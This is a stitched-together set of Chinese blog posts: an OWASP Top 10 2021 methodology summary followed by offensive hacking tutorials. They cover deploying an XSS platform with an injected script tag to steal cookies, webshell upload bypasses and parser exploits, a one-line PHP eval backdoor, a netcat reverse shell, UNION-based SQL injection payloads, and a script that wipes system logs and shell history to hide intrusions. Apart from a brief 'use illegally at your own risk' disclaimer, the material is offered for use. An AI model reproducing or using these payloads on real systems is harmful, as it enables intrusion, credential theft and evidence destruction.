A10是直接从行业调查第1位中添加的。数据显示，在高于平均水平的测试里，A10的发生率相对较低，但Exploit和潜在的Impact都高于平均水平。这也正表示了行业专业人士在告诉我们，就算目前数据中没有显示出来，服务器请求伪造还是很重要的事实。  评选方式 新版Top 10的评选比以前都看重数据，但并非盲目受数据影响。OWASP从各方贡献的数据中选择了10个主题中的8个，然后从高水平行业调查中选择了剩下的2个。这样做的根本原因是，查看贡献的数据就等于是回顾过去。AppSec研究人员花了大量时间去寻找新的漏洞和测试它们的新方法，但将这些测试运用到实际工具和流程中还需要等待一段时间。等到能够可靠地进行大规模测试时，时间可能已经过去了很久。为了平衡这点，就应该将行业调查利用起来。去询问专业的一线人员，关于他们所发现的可能还尚未在数据中显示出来的漏洞。 这就是OWASP采用的为了使Top 10变得更加成熟的关键变化措施。  怎样归纳出各个主题？ 与上一期OWASP Top 10相比，一些主题发生了改变。以下是关于主题变更的高级摘要。以前的数据收集工作集中在大约 30 个CWE的规定子集上，并要求有1个额外发现的领域。OWASP了解到，组织将主要关注那 30 个 CWE，很少添加他们看到的其它CWE。本次迭代中OWASP完全抱着开放心态，只询问数据，对CWE没有设置任何限制。他们查询了从 2017 年开始测试的应用程序数量，以及在测试中发现至少一个 CWE实例的应用程序数量。这种形式使OWASP能够跟踪每个CWE在应用程序群体中的活跃程度。应用程序有4个CWE实例还是4000个实例，都不是影响进入Top 10的因素。在大约30个CWE到近400个CWE的跨度下，对数据集中进行了分析。未来将计划做额外的数据分析作为补充。这种在CWE数量需求上的增加会影响到提炼、归纳主题的方式。 OWASP用了好几个月的时间对 CWE 进行分组和分类，本需要再多花几个月，但他们不得不停下来。CWE可以分为“根本原因（root cause）”和“症状表现（symptom type）”类型，其中根本原因类型如“加密失败”和“错误配置”，可以和“敏感数据暴露”和“拒绝服务”等症状表现类型形成对比。OWASP决定尽可能关注根本原因，因为在提供识别和补救建议方面，根本原因更加重要。关注根本原因而不是症状表现，这并不是一个新概念。Top 10便是症状表现和根本原因的混合体，CWE也同样是症状表现和根本原因的混合体。现版本中每个类别平均有 19.6 个 CWE，A10：2021-服务器端请求伪造(SSRF) 的下限为 1 个 CWE，而 A04：2021-不安全设计中的 CWE 下限为 40 个。现版本更新的归纳法其实提供了额外的培训好处，比方公司可以专注于对语言/框架有意义的 CWE。  在归纳过程中，我们如何使用数据？ 2017年，OWASP根据事件发生概率来挑选各种主题，然后通过团队讨论，根据以往数十年的可利用性（exploitability）、可检测性（Detectability，也是可能性）和技术影响（Technical Impact）这三点来进行了排名。对于 2021 年，OWASP选择将数据用于利用（Exploit）和影响（Impact）的统计。 OWASP下载了OWASP Dependency Check，并提取了按相关CWE分组的CVSS 利用和影响的分数。这需要他们用一段时间去研究，因为所有CVE都有 CVSSv2 分数，但CVSSv2中存在CVSSv3应该解决的缺陷。过了段时间，所有CVE都被标上了CVSSv3 分数，并且CVSSv2与CVSSv3的评分范围和公式也进行了更新。 在 CVSSv2 中，利用和影响最大可以达到 10.0分，但公式会将它们的分数降低，利用只剩60%，影响下降至原本的40%。在CVSSv3 中，利用的理论最大分数限制为 6.0，影响的理论最大分数限制为4.0。考虑到权重，影响的评分在 CVSSv3 中平均上升了近1.5，而利用的评分平均下降了0.5。 OWASP Dependency Check提取的NVD数据中，有125000条CVE对应到CWE的记录，对应到CVE的特殊CWE有241条。62000条 CWE有CVSSv3 分数，大约是数据集数量的一半。 对于Top 10，OWASP按以下方式计算平均利用和影响分数。按CWE将所有有CVSS分数的CVE分组，并通过“有 CVSSv3数量的百分比”+“剩余有CVSSv2 的数量”，对利用和影响进行加权，获得了总体平均值。再将这些平均值对应到数据集中CWE，以用作另一半的风险等式的利用和影响评分。...

一、下载平台源码、拷贝到我们网站的根目录 https://github.com/anwilx/xss_platform 二、修改相关参数 1、config.php，数据库用户、密码、还有xss平台的访问路径 2、导入sql文件，测试的时候没法导入，所以就手动创建了数据库 新建数据库 打开xssplatform.sql，将里面的sql语句执行一遍 3、更新站点域名，将作者的域名替换，一共有四处 将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss"); 4、修改authtest文件 三、平台利用 1、注册一个账户 2、创建一个项目 3、配置相关信息，根据需要，添加模块 4、复制script里面代码，插入到存在xss漏洞的页面 <script src=http://192.168.139.129/xss/E3vbsa></script> 5、打开xss平台，已获取对方cookie 禁止非法，后果自负 ...

0x00 信息收集 1.目标确认 1.1 域名注册信息 目标所有者信息 获取真实IP 验证是否存在CDN 绕过CDN查找网站真实IP 1.2 DNS信息查询 目的: 注册者名称及邮箱,再反查其他域名 手机号 座机号 ASN号 地址在线DNS信息查询工具 1.3 测试域传送漏洞 域传送是一种DNS事务，用于在主从服务器间复制DNS记录。虽然如今已经很少见主机会开启，但是还是应该确认一下。一旦存在域传送漏洞，就意味着你获取了整个域下面所有的记录。 1.4 业务相关 github泄露： 网盘泄露： 各种云网盘 敏感路径扫描： 2.OSINT 公开情报收集 2.1 社工技巧 查看注册的网站： 可以从这些方面判断用户是否注册过 知道QQ 知道手机号 留意社交动态 2.2 搜索引擎OSINT Google Hacking(baidu\bing\souhu\github) 2.3 浏览器实用插件： Wappalyzer：识别网站使用的中间件及其版本，再去漏洞库和搜索引擎找公开披露的漏洞 SwitchOmega：快捷切换代理 shodan：识别开放端口，主机服务等（被动信息搜集） hacktools:综合插件,很强大 firefox渗透便携版version48,工具集成很多 注意：根据获得服务、中间件信息、编辑器版本、数据库等OSINT去各大漏洞库、搜索引擎找漏洞利用 2.4 乌云和cnvd 乌云库\乌云镜像\GHDB\CNVD等公开漏洞库 0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌，主动探测会暴露ip以及留下日志信息，所以要... 1.主动扫描 1.1 常见服务漏洞 nmap的功能: 脚本扫描，隐蔽扫描，端口扫描，服务识别，OS识别，探测WAF 1.3 WAF及bypass 探测WAF bypass 1.4 目录、后台和敏感路径文件扫描 御剑目录、后台扫描 2.人工浏览\逐个请求burp 非常重要,有必要手动去浏览每个页面，点击页面上每一个跳转，这样在Burp的sitemap里面就可以出现这些请求和响应。 图片后台地址\图片后面的信息 跳转参数\奇怪的参数 泄露邮箱等社工信息 业务逻辑\架构 3.自动化 自动化渗透测试框架:(待补充) Sn1per Ary 0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1 Nikto Web服务漏洞扫描器 1.2 AWVS漏扫 1.3 NESSUS 1.4 Xray自动化的漏洞挖掘 1.5 Fuzz 2.挖掘漏洞 2.1 SQL注入： 2.2 XSS： 2.3 文件上传 2.4 命令执行 2.5 弱口令及字典破解 后台弱口令爆破撞库 2.6 逻辑漏洞 0x03 漏洞利用 对应0x02的挖掘漏洞，进行对应的利用。 0x04 提升权限 提升权限不一定需要，根据任务目标决定。 1.1 内核漏洞 1.2 root权限运行的漏洞软件 1.3 弱密码/重用密码 1.4 suid配置错误 1.5 滥用sudo 1.6 Cronjobs 1.6 敏感文件 0x05 达成目标 1.1 重要文件窃取 1.2 数据库数据窃取、修改 0x06 权限维持 1.1 web后门 1.2 SSH后门 1.3 Cronjobs 1.4 SSH公钥 1.5 SUID=0用户 1.6 木马文件 0x07 防御对抗 1.1 日志清除 1.2 防护软件对抗（卸载） 1.3 进程注入 1.4 进程隐藏 0x08 横向移动 1.1 信息收集 1.2 隧道搭建 1.3 内网扫描 1.4 漏洞扫描 返回到主动探测的步骤，再来一遍。 写在结尾 很多攻击手法不能一一列举，之后会单独分模块展开叙述，如有技术问题交流，可以加入交流群。 ...

一、技术架构 1、C/S模式 客户端与服务器进行交互，比如qq、播放器 2、B/S模式 浏览器与服务器进行交互，比如各种浏览器 二、HTTP协议 1、概念 HTTP协议(HyperText Transfer protocol),超文本传输协议)是用于从WWW服务器传输超文本到本地浏览器的传输协议。它可以使浏览器更加高效,使网络传输减少。它不仅保证计算机正确快速地传输超文本文档,还确定传输文档中的哪一部分,以及哪部分内容首先显示(如文本先于图形)等。 2、交互过程 3、请求方式，搞清楚这两种GET、POST GET / HTTP/1.1 //请求头、 绝对路径、http版本Host: www.baidu.com //主机地址Connection: keep-alive //保持连接User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54 //浏览器指纹Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 //可接受数据类型Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6//数据是否压缩Cookie: COOKIE_SESSION=172_0_2_0_2_0_1_0_2_0_0_0_230_1603019818_3_0_1603019991_0_1603019988%7C3%230_1_1603019816%7C1; BAIDUID=9E26AC2D4C32E68570BEE1E10C800038:FG=1; BIDUPSID=9E26AC2D4C32E685011F62D003139B4A; PSTM=1603019471 //cookie信息 POST /dvwa/login.php HTTP/1.1 //请求方式、绝对路径、http版本信息Host: 192.168.1.106 //主机地址Content-Length: 86 //实体数据的大小Cache-Control: max-age=0 //向server 发送http 请求确认 ,该资源是否有修改,有的话 返回200 ,无的话 返回304.Origin: http://192.168.1.106 //谁发起的Content-Type: application/x-www-form-urlencoded //告诉客户端实际返回的内容的内容类型User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 //浏览器指纹Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 //可接受数据类型Referer: http://192.168.1.106/dvwa/login.php //重定向地址Accept-Encoding: gzip, deflate //可接受压缩数据包Accept-Language: zh-CN,zh;q=0.9 //可接受数据语言Cookie: security=low; PHPSESSID=7maqsmj55p7t98luium583pm91 //cookie信息Connection: close //关闭长连接 //回车username=admin&password=123321&Login=Login&user_token=5a5e4fe4cd22298541d4accc9574f51e //post提交的数据 4、状态码 200：正常访问 302：重定向 403：文件存在，但是禁止访问 404：文件不存在 500：服务器宕机 三、OSI七层模型 1、物理层---网卡 2、数据链路层---交换机 3、网络层---路由器 4、传输层---TCP/IP协议 5、会话层---建立通信拨号上网 6、表示层---数据的加解密 7、应用层---HTTP协议 四、Cookie和Session 1、Session与Cookie的最大区别就是一个存储在服务器端，一个存储在客户端。 2、cookie不是很安全，别人可以分析存放在本地的COOKIE并进行COOKIE欺骗。 3、session会在一定时间内保存在服务器上。当访问增多，会比较占用你服务器的性能。 4、单个cookie保存的数据不能超过4K，很多浏览器都限制一个站点最多保存20个cookie。 禁止非法，后果自负 ...

一、概念 文件上传漏洞，也就是常说的上传木马程序，一般先传小马，通过小马上传大马 文件包含漏洞，可以读取服务器本地文件 二、文件上传 1、本地上传限制不严格，头像上传，通过修改数据包上传文件后缀，可以绕过该限制。 选择一句话木马的php文件，提示只能上传JPEG和PNG文件 抓包，将Content-Type属性修改为：image/jpeg,点击发送 解释：MIME类型用来设定某种扩展名文件的打开方式,当具有该扩展名的文件被访问时,浏览器会自动使用指定的应用程序来打开。如GIF图片MIME为Image/gCSs文件MIME类型为text/ss。上传时,程序会对文件MME类型做验证。 提示上传成功 菜刀连接 2、服务器配置不当，HTTP没有禁用PUT和OPTIONS请求方法 3、文件解析漏洞：Apche、Nginx、IIS Apache解析漏洞 Apache对文件解析是从右到左的,由于 Apache无法解析rar和owf后缀,但能够解析php后缀,因此 Apache会将 x.php owf.rar当做php格式的文件进行解析并执行 http://www.aiyoubucuo.com/x.php.owf.rar Nginx<8.03空字节代码执行漏洞 影响范围: Nginx0.5.0.6,0.7<=0.7.65,0.8<=0.8.37访问以下网址,服务器将把x.jpg文件当做php解析并执行 http://www.aiyoubucuo.com/x.jpg%00.php IIS7.0/IIS7.5/ Nginx<0.8.3畸形解析漏洞 在默以 Fast-CGI开启状况下,访问以下网址,服务器将把x.jpg文件当做php解析并执行 http://www.aiyoubucuo.com/x.jpg/.php IIS 5.x/6.0解析漏洞 目录解析:在网站下建立文件夹的名称中带有.asp、.asa等可执行脚本文件后缀为后缀的文件夹,其目录内的任何扩展名的文件都被IIS当作可执行文件来解析并执行 http://www.aiyoubucuo.com/x.asp/x.jpg 文件解析在IIS6.0下,分号后面的不被解析x. asp;.jpg将被当做x.asp解析并执行。 http://www.aiyoubucuo.com/x.asp;.jpg IIS6.0默认的可执行文件有asp、asa、cer、cdx四种。 4、文件路径截断：%00截断 00截断的原理,就是利用0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 限制条件： 0X00截断是16进制的截断,需要修改16进制的数据头,使用burp在Hex中对数据进行改写 PHP<53.29, magic_quotes_gpc=OFF %00的使用是在路径上,不是在文件名中"a. php%00b jpg" 由于%00做了截断,所以最后服务器接收到的文件名依然还是 a. php,因为在接收的时候,就直接对url编码进行解码,然后再去接收文件,这时候的文件名就变成了a.php,后面的 b. jpg已经被截断 三、文件包含漏洞 1、概念 一些网站由于业务需求,提供文件下载功能,但如果对用户查看或下载的文件不受限制,则恶意用户就能够查看或下载任意敏感文件,如脚本代码,服务及系统配置文件等,如果得到代码可以进行代码审计,得到更多可利用漏洞直接执行代码的函数: 2、常用函数 eval()、 assert()、 system()、exec()、 shell exec()、 passthru()、 escapeshellcmd()、 pcnl_exec()等 eval()：该函数把字符串按照PHP代码来计算,如常见的句话后门程序:<? php eval($_ POST[a])?> assert()：该函数与eval类似,字符串被 assert()当做PHP代码来执行; 3、PHP中常见的导致文件包含的函数:  require:找不到被包含的文件时会产生致命错误( E COMPILE ERROR),并停止脚本 include:找不到被包含的文件时只会产生-个( E waring),脚本将继续执行 require_once:与 require类似会产生警告,区别是如果文件代码已经被包含,则不会再次被包含 include once:与 include类似会产生警告,区别是如果文件代码已经被包含,则不会再次被包含 4、重要文件路径 1、Unix/liux系统： /etc/passwd /usr/local/app/apache2/conf/httpd.conf //apache2默认配置文件/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置/usr/local/app/php5/lib/php.ini //PHP相关设置/etc/httpd/conf/httpd.conf //apache配置文件/etc/my.cnf //Mysql配置文件 2、Windows系统 C:\\boot.ini //查看系统版本C:\windows\\system32\\inetsrv\\MetaBase.xml //IIS配置文件C:\\Program files\\mysql\\my.ini //mysql配置C:\\Program Filed\\mysql\data\\mysql\\user.MYD //Mysql rootC:\\windows\\php.ini //php配置信息C:\\windows\\my.ini // Mysql配置文件 禁止非法，后果自负 ...

小攻：IP地址：192.168.139.129  Win7 小受：IP地址：192.168.139.128，Ubuntu 一、拿到webshell后，点击反弹提权 二、小攻运行nv -vv -l -p 3355 三、在反弹提权页面，输入小攻的地址及上面监听的端口号，点击开始连接 四、小攻已成功连接小受，输入命令函数whoami查看权限是www 五、查看该系统版本号uname -a，根据该版本号查找相应的EXP，上传到小受并执行 六、工具下载：加入交流群 禁止非法，后果自负 ...

一、产生原因代码与数据不区分。程序把用户输入的恶意内容传入SQL语句中执行,导致SQL注入漏洞产生。 二、常见挖掘方式 直接对url中的参数（请求参数、请求头）进行注入 Burp抓取post包进行注入 三、判断注入点 单引号判断：如果出现错误回显，则该页面就可能存在sql注入 http://www.webanquangongjuku.com/aiyou.php?id=1' and判断： http://www.webanquangongjuku.com/aiyou.php?id=1' and 1=1 返回正常http://www.webanquangongjuku.com/aiyou.php?id=1' and1=2 如果报错，说明存在注入 or判断： http://www.webanquangongjuku.com/aiyou.php?id=1' or 1=1 http://www.webanquangongjuku.com/aiyou.php?id=1' or 1=2 返回正常，说明存在注入 XOR判断：后面的语句如果是正确的，则返回错误页面，如果是错误的，则返回正确页面，说明存在注入点 http://www.webanquangongjuku.com/aiyou.php?id=1' xor 1=1 http://www.webanquangongjuku.com/aiyou.php?id=1' xor 1=2 加减号数字判断：返回的页面和前面的页面相同，加上-1，返回错误页面，则表示存在注入漏洞 http://www.webanquangongjuku.com/aiyou.php?id=10-1 四、GET请求注入流程： 1、判断是否存在注入 1' 1' and 1=1 2、判断可显示列 1' order by 2#1' order by 3# 1' union select 1,2# 3、查询版本号和数据库 1' union select version(),database()# 4、获取当前数据库的所有表名 1' union select 1,table_name from information_schema.tables where table_schema=database()# 5、获取users表的列名 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'# 6、获取users表的user和password列 1' union select user,password from users# 五、POST请求注入流程 1、通过BurpSuite抓包 2、可以手动判断，但是能用sqlmap就不用手动，所以将该包保存到1.txt文件 sqlmap -r 1.txt 3、查看是不是管理员权限 sqlmap -r 1.txt --is-dba 禁止非法，后果自负 ...

一、前言 在渗透完成之后，为了减少被发现和追溯的概率，攻击者有必要清除自己的攻击痕迹，本文分别对windows和linux上清理痕迹的方式做一个总结。 二、windows 有远程桌面权限时手动删除日志： 1 开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志 wevtutil： 1 2 3 4 wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl security 清理安全日志 meterperter自带清除日志功能： 1 clearev 清除windows中的应用程序日志、系统日志、安全日志 清除recent： 在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮 或直接打开C:\Users\Administrator\Recent并删除所有内容 或在命令行中输入del /f /s /q “%userprofile%\Recent*.* 三、linux 清除命令历史记录 1 2 3 4 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 HISTZISE=0 #通过设置历史命令条数来清除所有历史记录 在隐蔽的位置执行命令 使用vim打开文件执行命令 1 2 :set history=0 :!command linux日志文件 1 2 3 4 5 6 7 8 9 10 11 /var/run/utmp 记录现在登入的用户 /var/log/wtmp 记录用户所有的登入和登出 /var/log/lastlog 记录每一个用户最后登入时间 /var/log/btmp 记录错误的登入尝试 /var/log/auth.log 需要身份确认的操作 /var/log/secure 记录安全相关的日志信息 /var/log/maillog 记录邮件相关的日志信息 /var/log/message 记录系统启动后的信息和错误日志 /var/log/cron 记录定时任务相关的日志信息 /var/log/spooler 记录UUCP和news设备相关的日志信息 /var/log/boot.log 记录守护进程启动和停止相关的日志消息 完全删除日志文件： 1 2 3 4 5 cat /dev/null > filename : > filename > filename echo "" > filename echo > filename 针对性删除日志文件： 1 2 删除当天日志 sed -i '/当天日期/'d filename 篡改日志文件： 1 2 将所有170.170.64.17ip替换为127.0.0.1 sed -i 's/170.170.64.17/127.0.0.1/g' 一键清除脚本： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 #!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/user.log echo > /var/log/wtmp echo > /var/log/lastlog echo > /var/log/btmp echo > /var/run/utmp rm ~/./bash_history history -c ...